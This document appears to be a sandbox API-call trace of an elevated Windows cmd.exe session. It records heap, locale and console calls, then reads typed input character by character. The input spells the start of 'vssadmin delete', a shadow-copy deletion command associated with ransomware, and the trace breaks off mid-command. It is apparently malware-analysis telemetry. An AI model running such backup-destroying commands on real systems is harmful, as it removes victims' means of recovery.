GetProcessHeap () returned 0x2e8a1bb0000 [0044.187] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x40) returned 0x2e8a1bb84b0 [0044.187] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e8a1da0040 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.187] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x2e8a1da0040, lpFilePart=0xf1b85af2a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xf1b85af2a0*="Desktop") returned 0x17 [0044.187] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0044.188] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xf1b85aefd0 | out: lpFindFileData=0xf1b85aefd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2e8a1bb8500 [0044.188] FindClose (in: hFindFile=0x2e8a1bb8500 | out: hFindFile=0x2e8a1bb8500) returned 1 [0044.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xf1b85aefd0 | out: lpFindFileData=0xf1b85aefd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x2e8a1bb8500 [0044.188] FindClose (in: hFindFile=0x2e8a1bb8500 | out: hFindFile=0x2e8a1bb8500) returned 1 [0044.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xf1b85aefd0 | out: lpFindFileData=0xf1b85aefd0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x699af32d, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x699af32d, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2e8a1bb8500 [0044.188] FindClose (in: hFindFile=0x2e8a1bb8500 | out: hFindFile=0x2e8a1bb8500) returned 1 [0044.188] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0044.188] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0044.188] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0044.188] GetProcessHeap () returned 0x2e8a1bb0000 [0044.188] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb7a10) returned 1 [0044.188] GetEnvironmentStringsW () returned 0x2e8a1bb0fc0* [0044.188] GetProcessHeap () returned 0x2e8a1bb0000 [0044.188] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0xacc) returned 0x2e8a1bb8500 [0044.189] FreeEnvironmentStringsA (penv="=") returned 1 [0044.189] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e8a1d80080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0044.189] GetProcessHeap () returned 0x2e8a1bb0000 [0044.189] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb84b0) returned 1 [0044.189] ??_V@YAXPEAX@Z () returned 0x1 [0044.189] ??_V@YAXPEAX@Z () returned 0x1 [0044.189] GetProcessHeap () returned 0x2e8a1bb0000 [0044.189] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x4016) returned 0x2e8a1bb8fe0 [0044.189] GetProcessHeap () returned 0x2e8a1bb0000 [0044.189] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb8fe0) returned 1 [0044.189] GetConsoleOutputCP () returned 0x1b5 [0044.510] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6d1acfbb0 | out: lpCPInfo=0x7ff6d1acfbb0) returned 1 [0044.510] GetUserDefaultLCID () returned 0x409 [0044.510] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6d1acbb78, cchData=8 | out: lpLCData=":") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xf1b85af660, cchData=128 | out: lpLCData="0") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xf1b85af660, cchData=128 | out: lpLCData="0") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xf1b85af660, cchData=128 | out: lpLCData="1") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6d1acbb68, cchData=8 | out: lpLCData="/") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6d1acbb00, cchData=32 | out: lpLCData="Mon") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6d1acbac0, cchData=32 | out: lpLCData="Tue") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6d1acba80, cchData=32 | out: lpLCData="Wed") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6d1acba40, cchData=32 | out: lpLCData="Thu") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6d1acba00, cchData=32 | out: lpLCData="Fri") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6d1acb9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6d1acb980, cchData=32 | out: lpLCData="Sun") returned 4 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6d1acbb58, cchData=8 | out: lpLCData=".") returned 2 [0044.511] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6d1acbb40, cchData=8 | out: lpLCData=",") returned 2 [0044.511] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0044.512] GetProcessHeap () returned 0x2e8a1bb0000 [0044.512] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, Size=0x20c) returned 0x2e8a1bb6560 [0044.512] GetConsoleTitleW (in: lpConsoleTitle=0x2e8a1bb6560, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0044.697] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.698] GetFileType (hFile=0x288) returned 0x3 [0044.698] ApiSetQueryApiSetPresence () returned 0x0 [0044.698] ResolveDelayLoadedAPI () returned 0x7ff9127ed990 [0044.702] BrandingFormatString () returned 0x2e8a1bb1850 [0044.721] GetVersion () returned 0x3ad7000a [0044.721] _vsnwprintf (in: _Buffer=0xf1b85af7c0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0xf1b85af758 | out: _Buffer="10.0.15063") returned 10 [0044.721] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.721] GetFileType (hFile=0x288) returned 0x3 [0044.721] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6d1ad7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0044.722] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6d1ad7f60, nSize=0x2000, Arguments=0xf1b85af760 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0044.722] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xf1b85af6b8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af6b8*=0x26, lpOverlapped=0x0) returned 1 [0044.722] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xf1b85af788 | out: _Buffer="\r\n") returned 2 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] GetFileType (hFile=0x288) returned 0x3 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0044.722] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xf1b85af758, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af758*=0x2, lpOverlapped=0x0) returned 1 [0044.722] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0xf1b85af788 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] GetFileType (hFile=0x288) returned 0x3 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0044.722] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xf1b85af758, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af758*=0x34, lpOverlapped=0x0) returned 1 [0044.722] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xf1b85af788 | out: _Buffer="\r\n") returned 2 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] GetFileType (hFile=0x288) returned 0x3 [0044.722] _get_osfhandle (_FileHandle=1) returned 0x288 [0044.722] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0044.722] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xf1b85af758, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af758*=0x2, lpOverlapped=0x0) returned 1 [0044.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff92fdd0000 [0044.723] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="CopyFileExW") returned 0x7ff92fdee830 [0044.723] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="IsDebuggerPresent") returned 0x7ff92fdee300 [0044.723] GetProcAddress (hModule=0x7ff92fdd0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff92f1b0a40 [0044.723] ??_V@YAXPEAX@Z () returned 0x1 [0044.723] _get_osfhandle (_FileHandle=0) returned 0x27c [0044.723] GetFileType (hFile=0x27c) returned 0x3 [0044.723] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0044.723] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0xf1b85af5c8 | out: TokenHandle=0xf1b85af5c8*=0x0) returned 0xc000007c [0044.723] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xf1b85af5c8 | out: TokenHandle=0xf1b85af5c8*=0x94) returned 0x0 [0044.723] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0xf1b85af578, TokenInformationLength=0x4, ReturnLength=0xf1b85af580 | out: TokenInformation=0xf1b85af578, ReturnLength=0xf1b85af580) returned 0x0 [0044.723] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0xf1b85af580, TokenInformationLength=0x4, ReturnLength=0xf1b85af578 | out: TokenInformation=0xf1b85af580, ReturnLength=0xf1b85af578) returned 0x0 [0044.723] NtClose (Handle=0x94) returned 0x0 [0044.723] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0xf1b85af590, nSize=0x0, Arguments=0xf1b85af598 | out: lpBuffer="\x8320\xa1bb\x2e8") returned 0xf [0044.724] GetProcessHeap () returned 0x2e8a1bb0000 [0044.724] RtlAllocateHeap (HeapHandle=0x2e8a1bb0000, Flags=0x8, Size=0x218) returned 0x2e8a1bb6c30 [0044.724] GetConsoleTitleW (in: lpConsoleTitle=0xf1b85af5e0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0044.916] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0044.922] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0045.090] GetProcessHeap () returned 0x2e8a1bb0000 [0045.090] RtlFreeHeap (HeapHandle=0x2e8a1bb0000, Flags=0x0, BaseAddress=0x2e8a1bb6c30) returned 1 [0045.090] LocalFree (hMem=0x2e8a1bb8320) returned 0x0 [0045.091] _vsnwprintf (in: _Buffer=0x7ff6d1ad7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xf1b85af408 | out: _Buffer="\r\n") returned 2 [0045.091] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.091] GetFileType (hFile=0x288) returned 0x3 [0045.091] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.091] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0045.091] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xf1b85af3d8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af3d8*=0x2, lpOverlapped=0x0) returned 1 [0045.091] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6d1acbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0045.091] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2e8a1d80080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0045.091] malloc (_Size=0x107ce) returned 0x2e8a1d90060 [0045.092] _vsnwprintf (in: _Buffer=0x2e8a1d90060, _BufferCount=0x83e5, _Format="%s", _ArgList=0xf1b85af418 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0045.092] _vsnwprintf (in: _Buffer=0x2e8a1d9008e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xf1b85af418 | out: _Buffer=">") returned 1 [0045.092] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.092] GetFileType (hFile=0x288) returned 0x3 [0045.092] _get_osfhandle (_FileHandle=1) returned 0x288 [0045.092] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Desktop>", cchWideChar=-1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Desktop>", lpUsedDefaultChar=0x0) returned 25 [0045.092] WriteFile (in: hFile=0x288, lpBuffer=0x7ff6d1ac9970*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0xf1b85af408, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesWritten=0xf1b85af408*=0x18, lpOverlapped=0x0) returned 1 [0045.092] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.092] GetFileType (hFile=0x27c) returned 0x3 [0045.092] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.092] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.092] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.092] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c30, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0045.092] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.092] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.092] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.092] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c32, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.092] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.092] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c34, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c36, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c38, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.093] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.093] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0045.093] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.093] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c42, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c44, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c46, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, lpNumberOfBytesRead=0xf1b85af768*=0x1, lpOverlapped=0x0) returned 1 [0045.094] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6d1ac9970, cbMultiByte=1, lpWideCharStr=0x7ff6d1ad3c48, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0045.094] _get_osfhandle (_FileHandle=0) returned 0x27c [0045.094] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0045.094] ReadFile (in: hFile=0x27c, lpBuffer=0x7ff6d1ac9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xf1b85af768, lpOverlapped=0x0 | out: lpBuffer=0x7ff6d1ac9970*, 